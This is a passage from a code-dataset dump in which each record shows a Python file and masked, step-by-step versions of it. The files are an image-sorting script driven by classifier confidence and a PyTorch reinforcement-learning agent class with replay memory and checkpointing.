mscAtmIfVccEbrInfoOperTable=mscAtmIfVccEbrInfoOperTable, mscAtmIfVptVccEbrInfoStatsEntry=mscAtmIfVptVccEbrInfoStatsEntry, atmEbrGroupCA02A=atmEbrGroupCA02A, mscAtmIfVccEbrInfoOptimizationSubscribed=mscAtmIfVccEbrInfoOptimizationSubscribed, mscAtmIfVptVccSrcEbrOvRowStatusTable=mscAtmIfVptVccSrcEbrOvRowStatusTable, atmEbrMIB=atmEbrMIB, mscAtmIfVptVccEbrInfoRecoverySubscribed=mscAtmIfVptVccEbrInfoRecoverySubscribed, mscAtmIfVpcSrcEbrOvRowStatusEntry=mscAtmIfVpcSrcEbrOvRowStatusEntry, mscAtmIfVptVccEbrInfoRowStatus=mscAtmIfVptVccEbrInfoRowStatus, mscAtmIfVptIispEbrStatsEntry=mscAtmIfVptIispEbrStatsEntry, mscAtmIfPnniEbrStorageType=mscAtmIfPnniEbrStorageType, mscAtmIfPnniEbrProvEntry=mscAtmIfPnniEbrProvEntry, mscAtmIfVptUniEbrOperTable=mscAtmIfVptUniEbrOperTable, mscAtmIfIispEbrIneligibleRecoveredConnections=mscAtmIfIispEbrIneligibleRecoveredConnections, mscAtmIfVptIispEbrConnectionRecovery=mscAtmIfVptIispEbrConnectionRecovery, mscAtmIfVptUniEbr=mscAtmIfVptUniEbr, atmEbrGroupCA02=atmEbrGroupCA02, mscAtmIfVptIispEbrTotalConnectionRecoveries=mscAtmIfVptIispEbrTotalConnectionRecoveries, mscAtmIfUniEbrTotalPathOptimizations=mscAtmIfUniEbrTotalPathOptimizations, mscAtmIfVpcSrcEbrOvRecoverySubscribed=mscAtmIfVpcSrcEbrOvRecoverySubscribed, mscAtmIfVptPnniEbrOperTable=mscAtmIfVptPnniEbrOperTable, mscAtmIfVptVccSrcEbrOvOptimizationSubscribed=mscAtmIfVptVccSrcEbrOvOptimizationSubscribed, mscAtmIfVptUniEbrEligibleRecoveredConnections=mscAtmIfVptUniEbrEligibleRecoveredConnections, mscAtmIfVpcEbrInfoOptimizationSubscribed=mscAtmIfVpcEbrInfoOptimizationSubscribed, mscAtmIfVptPnniEbrIndex=mscAtmIfVptPnniEbrIndex, mscAtmIfUniEbrRowStatus=mscAtmIfUniEbrRowStatus, mscAtmIfUniEbrOperEntry=mscAtmIfUniEbrOperEntry, mscAtmIfVptVccSrcEbrOvStorageType=mscAtmIfVptVccSrcEbrOvStorageType, mscAtmIfVptPnniEbrTotalPathOptimizations=mscAtmIfVptPnniEbrTotalPathOptimizations, mscAtmIfVpcSrcEbrOvComponentName=mscAtmIfVpcSrcEbrOvComponentName, mscAtmIfVptVccEbrInfoComponentName=mscAtmIfVptVccEbrInfoComponentName, mscAtmIfIispEbrOperEntry=mscAtmIfIispEbrOperEntry, mscAtmIfVptVccSrcEbrOvRecoverySubscribed=mscAtmIfVptVccSrcEbrOvRecoverySubscribed, mscAtmIfIispEbrIndex=mscAtmIfIispEbrIndex, atmEbrCapabilitiesCA=atmEbrCapabilitiesCA, mscAtmIfVccEbrInfoTotalConnectionRecoveries=mscAtmIfVccEbrInfoTotalConnectionRecoveries)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# -*-coding:utf-8-*-
import os
import time
import shutil
import argparse
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--dir', type=str, required=True)
parser.add_argument('--task', type=str, required=True)
args = parser.parse_args()
if not os.path.exists(args.dir):
print("dir:{} not exist".format(args.dir))
exit(0)
result_dir = args.task
if not os.path.exists(result_dir):
os.makedirs(result_dir)
class_images = {}
dirs = ['same.high', 'same.low', 'diff.high', 'diff.low']
check_info = os.path.join(args.dir, "info.csv")
if not os.path.exists(check_info):
print("file:{} not exist".format(check_info))
check_list = {}
start_t = time.time()
with open(check_info, "r") as f:
line_str = f.readline()
# skip first line
line_str = f.readline()
while line_str:
line_str = line_str.strip()
# label_id: id labeled in dataset
# class_id: id predict
file_name, label_id, class_id, class_acc = line_str.split(",")
class_acc = float(class_acc)
if file_name == '327_20180115133328530498_00_004_5.jpg':
print("got")
init_id = class_id
if label_id == class_id:
if class_acc < 0.8:
init_id = label_id
_dir = 'same.low'
elif class_acc < 0.95:
_dir = 'same.high'
else:
line_str = f.readline()
continue
else:
if class_acc < 0.8:
init_id = label_id
_dir = 'diff.low'
else:
_dir = 'diff.high'
dest_dir = os.path.join(result_dir, _dir)
if not os.path.exists(dest_dir):
os.makedirs(dest_dir)
if _dir not in check_list:
check_list[_dir] = []
task_str = "{},{}\n".format(file_name, init_id)
check_list[_dir].append(task_str)
dest_path = os.path.join(dest_dir, file_name)
file_path = os.path.join(args.dir, _dir, class_id, file_name)
shutil.copy(file_path, dest_path)
line_str = f.readline()
for _dir, _dir_list in check_list.items():
csv_path = os.path.join(result_dir, _dir, "ImageType.csv")
with open(csv_path, "w") as f:
for _str in _dir_list:
f.write(_str)
end_t = time.time()
print("finish in {} s".format(end_t - start_t))
|
normal
|
{
"blob_id": "dc3a3f5675860792ecfa7dcd5180402d89b669b1",
"index": 8254,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--dir', type=str, required=True)\n parser.add_argument('--task', type=str, required=True)\n args = parser.parse_args()\n if not os.path.exists(args.dir):\n print('dir:{} not exist'.format(args.dir))\n exit(0)\n result_dir = args.task\n if not os.path.exists(result_dir):\n os.makedirs(result_dir)\n class_images = {}\n dirs = ['same.high', 'same.low', 'diff.high', 'diff.low']\n check_info = os.path.join(args.dir, 'info.csv')\n if not os.path.exists(check_info):\n print('file:{} not exist'.format(check_info))\n check_list = {}\n start_t = time.time()\n with open(check_info, 'r') as f:\n line_str = f.readline()\n line_str = f.readline()\n while line_str:\n line_str = line_str.strip()\n file_name, label_id, class_id, class_acc = line_str.split(',')\n class_acc = float(class_acc)\n if file_name == '327_20180115133328530498_00_004_5.jpg':\n print('got')\n init_id = class_id\n if label_id == class_id:\n if class_acc < 0.8:\n init_id = label_id\n _dir = 'same.low'\n elif class_acc < 0.95:\n _dir = 'same.high'\n else:\n line_str = f.readline()\n continue\n elif class_acc < 0.8:\n init_id = label_id\n _dir = 'diff.low'\n else:\n _dir = 'diff.high'\n dest_dir = os.path.join(result_dir, _dir)\n if not os.path.exists(dest_dir):\n os.makedirs(dest_dir)\n if _dir not in check_list:\n check_list[_dir] = []\n task_str = '{},{}\\n'.format(file_name, init_id)\n check_list[_dir].append(task_str)\n dest_path = os.path.join(dest_dir, file_name)\n file_path = os.path.join(args.dir, _dir, class_id, file_name)\n shutil.copy(file_path, dest_path)\n line_str = f.readline()\n for _dir, _dir_list in check_list.items():\n csv_path = os.path.join(result_dir, _dir, 'ImageType.csv')\n with open(csv_path, 'w') as f:\n for _str in _dir_list:\n f.write(_str)\n end_t = time.time()\n print('finish in {} s'.format(end_t - start_t))\n",
"step-3": "import os\nimport time\nimport shutil\nimport argparse\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--dir', type=str, required=True)\n parser.add_argument('--task', type=str, required=True)\n args = parser.parse_args()\n if not os.path.exists(args.dir):\n print('dir:{} not exist'.format(args.dir))\n exit(0)\n result_dir = args.task\n if not os.path.exists(result_dir):\n os.makedirs(result_dir)\n class_images = {}\n dirs = ['same.high', 'same.low', 'diff.high', 'diff.low']\n check_info = os.path.join(args.dir, 'info.csv')\n if not os.path.exists(check_info):\n print('file:{} not exist'.format(check_info))\n check_list = {}\n start_t = time.time()\n with open(check_info, 'r') as f:\n line_str = f.readline()\n line_str = f.readline()\n while line_str:\n line_str = line_str.strip()\n file_name, label_id, class_id, class_acc = line_str.split(',')\n class_acc = float(class_acc)\n if file_name == '327_20180115133328530498_00_004_5.jpg':\n print('got')\n init_id = class_id\n if label_id == class_id:\n if class_acc < 0.8:\n init_id = label_id\n _dir = 'same.low'\n elif class_acc < 0.95:\n _dir = 'same.high'\n else:\n line_str = f.readline()\n continue\n elif class_acc < 0.8:\n init_id = label_id\n _dir = 'diff.low'\n else:\n _dir = 'diff.high'\n dest_dir = os.path.join(result_dir, _dir)\n if not os.path.exists(dest_dir):\n os.makedirs(dest_dir)\n if _dir not in check_list:\n check_list[_dir] = []\n task_str = '{},{}\\n'.format(file_name, init_id)\n check_list[_dir].append(task_str)\n dest_path = os.path.join(dest_dir, file_name)\n file_path = os.path.join(args.dir, _dir, class_id, file_name)\n shutil.copy(file_path, dest_path)\n line_str = f.readline()\n for _dir, _dir_list in check_list.items():\n csv_path = os.path.join(result_dir, _dir, 'ImageType.csv')\n with open(csv_path, 'w') as f:\n for _str in _dir_list:\n f.write(_str)\n end_t = time.time()\n print('finish in {} s'.format(end_t - start_t))\n",
"step-4": "# -*-coding:utf-8-*-\n\nimport os\nimport time\nimport shutil\nimport argparse\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--dir', type=str, required=True)\n parser.add_argument('--task', type=str, required=True)\n args = parser.parse_args()\n\n if not os.path.exists(args.dir):\n print(\"dir:{} not exist\".format(args.dir))\n exit(0)\n\n result_dir = args.task\n if not os.path.exists(result_dir):\n os.makedirs(result_dir)\n\n class_images = {}\n dirs = ['same.high', 'same.low', 'diff.high', 'diff.low']\n\n check_info = os.path.join(args.dir, \"info.csv\")\n if not os.path.exists(check_info):\n print(\"file:{} not exist\".format(check_info))\n\n check_list = {}\n\n start_t = time.time()\n\n with open(check_info, \"r\") as f:\n line_str = f.readline()\n # skip first line\n line_str = f.readline()\n while line_str:\n line_str = line_str.strip()\n\n # label_id: id labeled in dataset\n # class_id: id predict\n file_name, label_id, class_id, class_acc = line_str.split(\",\")\n class_acc = float(class_acc)\n\n if file_name == '327_20180115133328530498_00_004_5.jpg':\n print(\"got\")\n\n init_id = class_id\n if label_id == class_id:\n if class_acc < 0.8:\n init_id = label_id\n _dir = 'same.low'\n elif class_acc < 0.95:\n _dir = 'same.high'\n else:\n line_str = f.readline()\n continue\n else:\n if class_acc < 0.8:\n init_id = label_id\n _dir = 'diff.low'\n else:\n _dir = 'diff.high'\n\n dest_dir = os.path.join(result_dir, _dir)\n if not os.path.exists(dest_dir):\n os.makedirs(dest_dir)\n\n if _dir not in check_list:\n check_list[_dir] = []\n\n task_str = \"{},{}\\n\".format(file_name, init_id)\n check_list[_dir].append(task_str)\n\n dest_path = os.path.join(dest_dir, file_name)\n file_path = os.path.join(args.dir, _dir, class_id, file_name)\n\n shutil.copy(file_path, dest_path)\n\n line_str = f.readline()\n\n for _dir, _dir_list in check_list.items():\n csv_path = os.path.join(result_dir, _dir, \"ImageType.csv\")\n with open(csv_path, \"w\") as f:\n for _str in _dir_list:\n f.write(_str)\n\n end_t = time.time()\n print(\"finish in {} s\".format(end_t - start_t))\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import logging
import time
import random
import pickle
import os
from sys import maxsize
import torch
from tensorboardX import SummaryWriter
from baselines.common.schedules import LinearSchedule
from abp.utils import clear_summary_path
from abp.models.feature_q_model import feature_q_model
from abp.adaptives.common.prioritized_memory.memory_gqf import ReplayBuffer_decom
import numpy as np
logger = logging.getLogger('root')
use_cuda = torch.cuda.is_available()
FloatTensor = torch.cuda.FloatTensor if use_cuda else torch.FloatTensor
LongTensor = torch.cuda.LongTensor if use_cuda else torch.LongTensor
IntTensor = torch.cuda.IntTensor if use_cuda else torch.IntTensor
ByteTensor = torch.cuda.ByteTensor if use_cuda else torch.ByteTensor
Tensor = FloatTensor
class SADQ_GQF(object):
"""Adaptive which uses the SADQ algorithm"""
def __init__(self, name, state_length, network_config, reinforce_config, feature_len, combine_decomposed_func, is_sigmoid = False, memory_resotre = True):
super(SADQ_GQF, self).__init__()
self.name = name
#self.choices = choices
self.network_config = network_config
self.reinforce_config = reinforce_config
self.memory = ReplayBuffer_decom(self.reinforce_config.memory_size)
self.learning = True
self.explanation = False
self.state_length = state_length
self.features = 0
self.feature_len = feature_len
# Global
self.steps = 0
self.reward_history = []
self.episode_time_history = []
self.best_reward_mean = -maxsize
self.episode = 0
self.feature_len = feature_len
self.features = None
self.reset()
self.memory_resotre = memory_resotre
reinforce_summary_path = self.reinforce_config.summaries_path + "/" + self.name
if not self.network_config.restore_network:
clear_summary_path(reinforce_summary_path)
else:
self.restore_state()
self.summary = SummaryWriter(log_dir=reinforce_summary_path)
self.eval_model = feature_q_model(name, state_length, self.feature_len, self.network_config.output_shape, network_config)
self.target_model = feature_q_model(name, state_length, self.feature_len, self.network_config.output_shape, network_config)
# self.target_model.eval_mode()
self.beta_schedule = LinearSchedule(self.reinforce_config.beta_timesteps,
initial_p=self.reinforce_config.beta_initial,
final_p=self.reinforce_config.beta_final)
self.epsilon_schedule = LinearSchedule(self.reinforce_config.epsilon_timesteps,
initial_p=self.reinforce_config.starting_epsilon,
final_p=self.reinforce_config.final_epsilon)
# def __del__(self):
# self.save()
# self.summary.close()
def should_explore(self):
self.epsilon = self.epsilon_schedule.value(self.steps)
self.summary.add_scalar(tag='%s/Epsilon' % self.name,
scalar_value=self.epsilon,
global_step=self.steps)
return random.random() < self.epsilon
def predict(self, state, isGreedy = False, is_random = False):
if self.learning:
self.steps += 1
# add to experience
if self.previous_state is not None and self.learning and self.current_reward is not None:
state_crr = np.unique(state, axis=0)
self.memory.add(self.previous_state,
None,
self.current_reward,
state_crr.reshape(-1, self.state_length), 0,
self.features)
# print("not final : {}".format(self.current_reward) )
# print(0, self.features)
if self.learning and self.should_explore() and not isGreedy:
q_values = None
fv = None
choice = random.choice(list(range(len(state))))
action = choice
else:
with torch.no_grad():
features_vector, q_values = self.eval_model.predict_batch(Tensor(state))
q_values = FloatTensor(q_values).view(-1)
_, choice = q_values.max(0)
action = choice
fv = features_vector[choice]
# print("q_value : {}".format(q_values))
# input()
if self.learning and self.steps % self.reinforce_config.replace_frequency == 0:
logger.debug("Replacing target model for %s" % self.name)
if self.reinforce_config.replace_frequency != 1:
self.target_model.replace(self.eval_model)
else:
self.target_model.replace_soft(self.eval_model)
# self.target_model.eval_mode()
if (self.learning and
self.steps > self.reinforce_config.update_start and
self.steps % self.reinforce_config.update_steps == 0):
self.update_time -= time.time()
self.update()
self.update_time += time.time()
self.current_reward = 0
self.previous_state = state[action]
#self.previous_action = action
return choice, fv#,q_values
def disable_learning(self, is_save = False):
logger.info("Disabled Learning for %s agent" % self.name)
if is_save:
# self.save()
self.save(force = True)
self.learning = False
self.episode = 0
def enable_learning(self):
logger.info("enabled Learning for %s agent" % self.name)
self.learning = True
self.reset()
def end_episode(self, state):
if not self.learning:
return
# print("end:")
# print(self.current_reward)
# input()
episode_time = time.time() - self.episode_time
self.reward_history.append(self.total_reward)
self.episode_time_history.append(episode_time)
total_time = sum(self.episode_time_history)
avg_time = total_time / len(self.episode_time_history)
logger.info("End of Episode %d, "
"Total reward %.2f, "
"Epsilon %.2f" % (self.episode + 1,
self.total_reward,
self.epsilon))
logger.debug("Episode Time: %.2fs (%.2fs), "
"Prediction Time: %.2f, "
"Update Time %.2f" % (episode_time,
avg_time,
self.prediction_time,
self.update_time))
self.episode += 1
self.summary.add_scalar(tag='%s/Episode Reward' % self.name,
scalar_value=self.total_reward,
global_step=self.episode)
self.memory.add(self.previous_state,
None,
self.current_reward,
state.reshape(-1, self.state_length), 1,
self.features)
# print("final : {}".format(self.current_reward) )
# input()
# print(1, self.features)
self.save()
self.reset()
def reset(self):
self.episode_time = time.time()
self.current_reward = 0
self.total_reward = 0
self.previous_state = None
self.previous_action = None
self.prediction_time = 0
self.update_time = 0
self.features = None
def restore_state(self):
restore_path = self.network_config.network_path + "/adaptive.info"
if self.network_config.network_path and os.path.exists(restore_path) and self.memory_resotre:
logger.info("Restoring state from %s" % self.network_config.network_path)
with open(restore_path, "rb") as file:
info = pickle.load(file)
self.steps = info["steps"]
# self.best_reward_mean = info["best_reward_mean"]
self.episode = info["episode"]
self.memory.load(self.network_config.network_path)
print("lenght of memeory: ", len(self.memory))
def save(self, force=False, appendix=""):
info = {
"steps": self.steps,
"best_reward_mean": self.best_reward_mean,
"episode": self.episode
}
if (len(self.reward_history) >= self.network_config.save_steps and
self.episode % self.network_config.save_steps == 0) or force:
total_reward = sum(self.reward_history[-self.network_config.save_steps:])
current_reward_mean = total_reward / self.network_config.save_steps
if force: #or current_reward_mean >= self.best_reward_mean:
print("*************saved*****************", current_reward_mean, self.best_reward_mean)
if not force:
self.best_reward_mean = current_reward_mean
logger.info("Saving network. Found new best reward (%.2f)" % total_reward)
self.eval_model.save_network(appendix = appendix)
self.target_model.save_network(appendix = appendix)
# self.eval_model.save_network()
# self.target_model.save_network()
with open(self.network_config.network_path + "/adaptive.info", "wb") as file:
pickle.dump(info, file, protocol=pickle.HIGHEST_PROTOCOL)
self.memory.save(self.network_config.network_path)
print("lenght of memeory: ", len(self.memory))
else:
logger.info("The best reward is still %.2f. Not saving" % self.best_reward_mean)
def reward(self, r):
self.total_reward += r
self.current_reward += r
def passFeatures(self, features):
self.features = features.copy()
return
def summary_test(self, reward, epoch):
self.summary.add_scalar(tag='%s/eval reward' % self.name,
scalar_value=reward, global_step=epoch * 40)
def summary_GVFs_loss(self, loss, epoch):
self.summary.add_scalar(tag='%s/GVFs loss' % self.name,
scalar_value=loss, global_step=epoch * 40)
def update(self):
if len(self.memory._storage) <= self.reinforce_config.batch_size:
return
# self.eval_model.train_mode()
beta = self.beta_schedule.value(self.steps)
self.summary.add_scalar(tag='%s/Beta' % self.name,
scalar_value=beta, global_step=self.steps)
if self.reinforce_config.use_prior_memory:
batch = self.memory.sample(self.reinforce_config.batch_size, beta)
(states, actions, reward, next_states,
is_terminal, weights, batch_idxes) = batch
self.summary.add_histogram(tag='%s/Batch Indices' % self.name,
values=Tensor(batch_idxes),
global_step=self.steps)
else:
batch = self.memory.sample(self.reinforce_config.batch_size)
(states, actions, reward, next_states, is_terminal, features_vector) = batch
states = FloatTensor(states)
# print(states.size())
# next_states = FloatTensor(next_states)
terminal = FloatTensor([1 if t else 0 for t in is_terminal])
reward = FloatTensor(reward)
features_vector = FloatTensor(features_vector)
batch_index = torch.arange(self.reinforce_config.batch_size,
dtype=torch.long)
# Current Q Values
feature_values, q_values = self.eval_model.predict_batch(states)
q_values = q_values.flatten()
q_max = []
f_max = []
for i, ns in enumerate(next_states):
feature_n, q_n = self.target_model.predict_batch(FloatTensor(ns).view(-1, self.state_length))
q_value_max, idx = q_n.max(0)
features_max = feature_n[idx]
q_max.append(q_value_max)
if self.network_config.version in ["v10", "v11"]:
# print(features_max)
# print(ns[idx, 63:67])
# print(states[i, 63:67])
# print(features_max.size(), FloatTensor(ns).view(-1, self.state_length).size(), states.size())
features_max[:, :3] = (features_max[:, :3] * ns[idx, 65]) / states[i, 65]
features_max[:, 3:6] = (features_max[:, 3:6] * ns[idx, 66]) / states[i, 66]
features_max[:, 6:9] = (features_max[:, 6:9] * ns[idx, 63]) / states[i, 63]
features_max[:, 9:12] = (features_max[:, 9:12] * ns[idx, 64]) / states[i, 64]
features_max[features_max == float('inf')] = 0
# print(features_max)
# input()
f_max.append(features_max.view(-1))
# if torch.sum(terminal == torch.sum(features_vector, dim = 1)) != len(terminal):
# print(terminal)
# print(features_vector)
# input()
q_max = torch.stack(q_max, dim = 1).view(-1)
f_max = torch.stack(f_max)
q_max = (1 - terminal) * q_max
f_max = (1 - terminal.view(-1, 1)) * f_max
q_target = reward + self.reinforce_config.discount_factor * q_max
f_target = features_vector + self.reinforce_config.discount_factor * f_max
# if torch.sum(reward).item() > 0:
# print(reward)
# print(feature_values)
# print(q_target)
# print(q_values)
# input()
# update model
if (torch.sum(feature_values != feature_values).item() + torch.sum(f_target != f_target)).item() > 0:
# print("1")
# print(features_vector)
# print("2")
# print(feature_values)
# print("3")
# print(f_target)
# print("4")
# print(f_max)
# print("5")
# print(states.tolist())
# input()
f_target[f_target != f_target] = 0
self.eval_model.fit(q_values, q_target, feature_values, f_target)
# Update priorities
if self.reinforce_config.use_prior_memory:
td_errors = q_values - q_target
new_priorities = torch.abs(td_errors) + 1e-6 # prioritized_replay_eps
self.memory.update_priorities(batch_idxes, new_priorities.data)
def load_model(self, model):
self.eval_model.replace(model)
def load_weight(self, weight_dict):
self.eval_model.load_weight(weight_dict)
def load_model(self, model):
self.eval_model.replace(model)
def load_weight(self, new_feature_weights, new_q_weights):
self.eval_model.feautre_model.load_state_dict(new_feature_weights)
self.eval_model.q_model.load_state_dict(new_q_weights)
|
normal
|
{
"blob_id": "424a0e8a7a80e24aec4bdb9b8c84fd9a5e6090c6",
"index": 6782,
"step-1": "<mask token>\n\n\nclass SADQ_GQF(object):\n <mask token>\n <mask token>\n\n def should_explore(self):\n self.epsilon = self.epsilon_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Epsilon' % self.name, scalar_value=\n self.epsilon, global_step=self.steps)\n return random.random() < self.epsilon\n\n def predict(self, state, isGreedy=False, is_random=False):\n if self.learning:\n self.steps += 1\n if (self.previous_state is not None and self.learning and self.\n current_reward is not None):\n state_crr = np.unique(state, axis=0)\n self.memory.add(self.previous_state, None, self.current_reward,\n state_crr.reshape(-1, self.state_length), 0, self.features)\n if self.learning and self.should_explore() and not isGreedy:\n q_values = None\n fv = None\n choice = random.choice(list(range(len(state))))\n action = choice\n else:\n with torch.no_grad():\n features_vector, q_values = self.eval_model.predict_batch(\n Tensor(state))\n q_values = FloatTensor(q_values).view(-1)\n _, choice = q_values.max(0)\n action = choice\n fv = features_vector[choice]\n if (self.learning and self.steps % self.reinforce_config.\n replace_frequency == 0):\n logger.debug('Replacing target model for %s' % self.name)\n if self.reinforce_config.replace_frequency != 1:\n self.target_model.replace(self.eval_model)\n else:\n self.target_model.replace_soft(self.eval_model)\n if (self.learning and self.steps > self.reinforce_config.\n update_start and self.steps % self.reinforce_config.\n update_steps == 0):\n self.update_time -= time.time()\n self.update()\n self.update_time += time.time()\n self.current_reward = 0\n self.previous_state = state[action]\n return choice, fv\n <mask token>\n <mask token>\n\n def end_episode(self, state):\n if not self.learning:\n return\n episode_time = time.time() - self.episode_time\n self.reward_history.append(self.total_reward)\n self.episode_time_history.append(episode_time)\n total_time = sum(self.episode_time_history)\n avg_time = total_time / len(self.episode_time_history)\n logger.info('End of Episode %d, Total reward %.2f, Epsilon %.2f' %\n (self.episode + 1, self.total_reward, self.epsilon))\n logger.debug(\n 'Episode Time: %.2fs (%.2fs), Prediction Time: %.2f, Update Time %.2f'\n % (episode_time, avg_time, self.prediction_time, self.update_time)\n )\n self.episode += 1\n self.summary.add_scalar(tag='%s/Episode Reward' % self.name,\n scalar_value=self.total_reward, global_step=self.episode)\n self.memory.add(self.previous_state, None, self.current_reward,\n state.reshape(-1, self.state_length), 1, self.features)\n self.save()\n self.reset()\n\n def reset(self):\n self.episode_time = time.time()\n self.current_reward = 0\n self.total_reward = 0\n self.previous_state = None\n self.previous_action = None\n self.prediction_time = 0\n self.update_time = 0\n self.features = None\n\n def restore_state(self):\n restore_path = self.network_config.network_path + '/adaptive.info'\n if self.network_config.network_path and os.path.exists(restore_path\n ) and self.memory_resotre:\n logger.info('Restoring state from %s' % self.network_config.\n network_path)\n with open(restore_path, 'rb') as file:\n info = pickle.load(file)\n self.steps = info['steps']\n self.episode = info['episode']\n self.memory.load(self.network_config.network_path)\n print('lenght of memeory: ', len(self.memory))\n <mask token>\n <mask token>\n\n def passFeatures(self, features):\n self.features = features.copy()\n return\n\n def summary_test(self, reward, epoch):\n self.summary.add_scalar(tag='%s/eval reward' % self.name,\n scalar_value=reward, global_step=epoch * 40)\n <mask token>\n\n def update(self):\n if len(self.memory._storage) <= self.reinforce_config.batch_size:\n return\n beta = self.beta_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Beta' % self.name, scalar_value=\n beta, global_step=self.steps)\n if self.reinforce_config.use_prior_memory:\n batch = self.memory.sample(self.reinforce_config.batch_size, beta)\n (states, actions, reward, next_states, is_terminal, weights,\n batch_idxes) = batch\n self.summary.add_histogram(tag='%s/Batch Indices' % self.name,\n values=Tensor(batch_idxes), global_step=self.steps)\n else:\n batch = self.memory.sample(self.reinforce_config.batch_size)\n (states, actions, reward, next_states, is_terminal, features_vector\n ) = batch\n states = FloatTensor(states)\n terminal = FloatTensor([(1 if t else 0) for t in is_terminal])\n reward = FloatTensor(reward)\n features_vector = FloatTensor(features_vector)\n batch_index = torch.arange(self.reinforce_config.batch_size, dtype=\n torch.long)\n feature_values, q_values = self.eval_model.predict_batch(states)\n q_values = q_values.flatten()\n q_max = []\n f_max = []\n for i, ns in enumerate(next_states):\n feature_n, q_n = self.target_model.predict_batch(FloatTensor(ns\n ).view(-1, self.state_length))\n q_value_max, idx = q_n.max(0)\n features_max = feature_n[idx]\n q_max.append(q_value_max)\n if self.network_config.version in ['v10', 'v11']:\n features_max[:, :3] = features_max[:, :3] * ns[idx, 65\n ] / states[i, 65]\n features_max[:, 3:6] = features_max[:, 3:6] * ns[idx, 66\n ] / states[i, 66]\n features_max[:, 6:9] = features_max[:, 6:9] * ns[idx, 63\n ] / states[i, 63]\n features_max[:, 9:12] = features_max[:, 9:12] * ns[idx, 64\n ] / states[i, 64]\n features_max[features_max == float('inf')] = 0\n f_max.append(features_max.view(-1))\n q_max = torch.stack(q_max, dim=1).view(-1)\n f_max = torch.stack(f_max)\n q_max = (1 - terminal) * q_max\n f_max = (1 - terminal.view(-1, 1)) * f_max\n q_target = reward + self.reinforce_config.discount_factor * q_max\n f_target = (features_vector + self.reinforce_config.discount_factor *\n f_max)\n if (torch.sum(feature_values != feature_values).item() + torch.sum(\n f_target != f_target)).item() > 0:\n f_target[f_target != f_target] = 0\n self.eval_model.fit(q_values, q_target, feature_values, f_target)\n if self.reinforce_config.use_prior_memory:\n td_errors = q_values - q_target\n new_priorities = torch.abs(td_errors) + 1e-06\n self.memory.update_priorities(batch_idxes, new_priorities.data)\n <mask token>\n <mask token>\n\n def load_model(self, model):\n self.eval_model.replace(model)\n\n def load_weight(self, new_feature_weights, new_q_weights):\n self.eval_model.feautre_model.load_state_dict(new_feature_weights)\n self.eval_model.q_model.load_state_dict(new_q_weights)\n",
"step-2": "<mask token>\n\n\nclass SADQ_GQF(object):\n <mask token>\n\n def __init__(self, name, state_length, network_config, reinforce_config,\n feature_len, combine_decomposed_func, is_sigmoid=False,\n memory_resotre=True):\n super(SADQ_GQF, self).__init__()\n self.name = name\n self.network_config = network_config\n self.reinforce_config = reinforce_config\n self.memory = ReplayBuffer_decom(self.reinforce_config.memory_size)\n self.learning = True\n self.explanation = False\n self.state_length = state_length\n self.features = 0\n self.feature_len = feature_len\n self.steps = 0\n self.reward_history = []\n self.episode_time_history = []\n self.best_reward_mean = -maxsize\n self.episode = 0\n self.feature_len = feature_len\n self.features = None\n self.reset()\n self.memory_resotre = memory_resotre\n reinforce_summary_path = (self.reinforce_config.summaries_path +\n '/' + self.name)\n if not self.network_config.restore_network:\n clear_summary_path(reinforce_summary_path)\n else:\n self.restore_state()\n self.summary = SummaryWriter(log_dir=reinforce_summary_path)\n self.eval_model = feature_q_model(name, state_length, self.\n feature_len, self.network_config.output_shape, network_config)\n self.target_model = feature_q_model(name, state_length, self.\n feature_len, self.network_config.output_shape, network_config)\n self.beta_schedule = LinearSchedule(self.reinforce_config.\n beta_timesteps, initial_p=self.reinforce_config.beta_initial,\n final_p=self.reinforce_config.beta_final)\n self.epsilon_schedule = LinearSchedule(self.reinforce_config.\n epsilon_timesteps, initial_p=self.reinforce_config.\n starting_epsilon, final_p=self.reinforce_config.final_epsilon)\n\n def should_explore(self):\n self.epsilon = self.epsilon_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Epsilon' % self.name, scalar_value=\n self.epsilon, global_step=self.steps)\n return random.random() < self.epsilon\n\n def predict(self, state, isGreedy=False, is_random=False):\n if self.learning:\n self.steps += 1\n if (self.previous_state is not None and self.learning and self.\n current_reward is not None):\n state_crr = np.unique(state, axis=0)\n self.memory.add(self.previous_state, None, self.current_reward,\n state_crr.reshape(-1, self.state_length), 0, self.features)\n if self.learning and self.should_explore() and not isGreedy:\n q_values = None\n fv = None\n choice = random.choice(list(range(len(state))))\n action = choice\n else:\n with torch.no_grad():\n features_vector, q_values = self.eval_model.predict_batch(\n Tensor(state))\n q_values = FloatTensor(q_values).view(-1)\n _, choice = q_values.max(0)\n action = choice\n fv = features_vector[choice]\n if (self.learning and self.steps % self.reinforce_config.\n replace_frequency == 0):\n logger.debug('Replacing target model for %s' % self.name)\n if self.reinforce_config.replace_frequency != 1:\n self.target_model.replace(self.eval_model)\n else:\n self.target_model.replace_soft(self.eval_model)\n if (self.learning and self.steps > self.reinforce_config.\n update_start and self.steps % self.reinforce_config.\n update_steps == 0):\n self.update_time -= time.time()\n self.update()\n self.update_time += time.time()\n self.current_reward = 0\n self.previous_state = state[action]\n return choice, fv\n\n def disable_learning(self, is_save=False):\n logger.info('Disabled Learning for %s agent' % self.name)\n if is_save:\n self.save(force=True)\n self.learning = False\n self.episode = 0\n\n def enable_learning(self):\n logger.info('enabled Learning for %s agent' % self.name)\n self.learning = True\n self.reset()\n\n def end_episode(self, state):\n if not self.learning:\n return\n episode_time = time.time() - self.episode_time\n self.reward_history.append(self.total_reward)\n self.episode_time_history.append(episode_time)\n total_time = sum(self.episode_time_history)\n avg_time = total_time / len(self.episode_time_history)\n logger.info('End of Episode %d, Total reward %.2f, Epsilon %.2f' %\n (self.episode + 1, self.total_reward, self.epsilon))\n logger.debug(\n 'Episode Time: %.2fs (%.2fs), Prediction Time: %.2f, Update Time %.2f'\n % (episode_time, avg_time, self.prediction_time, self.update_time)\n )\n self.episode += 1\n self.summary.add_scalar(tag='%s/Episode Reward' 